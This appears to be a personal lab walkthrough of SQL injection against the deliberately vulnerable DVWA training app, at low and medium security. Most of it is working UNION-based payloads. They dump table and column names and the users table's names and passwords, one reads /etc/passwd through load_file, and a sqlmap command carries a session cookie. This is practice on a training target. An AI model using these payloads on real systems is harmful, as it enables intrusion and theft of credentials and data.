Security level = low
99 or 1=1
- will display all the records
99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message
99 or 1=1 union select 1,2
- no error message, but all records are displayed
99 or 1=1 union select null,null
- no error message, but all records are displayed
99 or 1=1 union select version(),database()
- will display the MySQL version and the database name (dvwa)
99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database
99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'
- will display the users table column list
99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for the users table's first_name and password columns
99 or 1=1 union select null,@@datadir
- will display the MySQL data directory
99 or 1=1 union all select null,load_file('/etc/passwd')
- will display the content of /etc/passwd
Security level = medium
99 or 1=1
- will display all the records
99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message
99 or 1=1 union select 1,2
- no error message, but all records are displayed
99 or 1=1 union select null,null
- no error message, but all records are displayed
99 or 1=1 union select version(),database()
- will display the MySQL version and the database name (dvwa)
99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database
99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- since the WHERE clause cannot be used here, all column names have to be listed
or
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273
- where 0x7573657273 is the hex encoding of "users"
99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for the users table's first_name and password columns
99 or 1=1 union select null,@@datadir
- will display the MySQL data directory
sqlmap for Security = low
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
For Security = medium the procedure is similar.
That's all! See you!